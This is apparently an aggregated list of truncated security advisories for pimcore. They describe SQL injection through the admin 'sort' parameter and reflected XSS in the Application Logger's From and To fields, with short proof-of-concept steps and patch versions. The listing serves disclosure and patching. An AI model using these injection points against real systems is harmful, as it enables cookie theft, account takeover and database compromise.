SQL injection in some Admin Sort functions

Description SQL injection due to unsanitized concatenating strings into ORDER BY clause, 'sort' parameter Proof of Concept Log in as an admin, go to Admin Translations or Application Logger functions, and perform a sort action Observer the request on Burpsuite and injection point is the 'sort'...

Reflected XSS in Application Logger module

Impact This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie or redirect users to other malicious sites. Patches Update to version 10.5.19 or apply this patch manually...

GHSA-2XPM-CMVW-3JCC Reflected XSS in Application Logger module

Impact This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie or redirect users to other malicious sites. Patches Update to version 10.5.19 or apply this patch manually...

Cross-Site Scripting (XSS)

pimcore/pimcore is vulnerable to Cross-Site Scripting XSS. The vulnerability exists due to the getTabPanel function in admin.js caused by the From and To fields when searching in the Application Logger module which allows an attacker to inject and execute arbitrary JavaScript...

Reflected XSS in Application Logger module

Description pimcore is vulnerable to Reflected XSS at From and To fields when searching in the Application Logger module. Payload " Proof of Concept 1.Go to https://demo.pimcore.fun/admin/ and login. 2.In the left menu bar, go to Tools - Application Logger. 3.In the Application Logger tab, on the...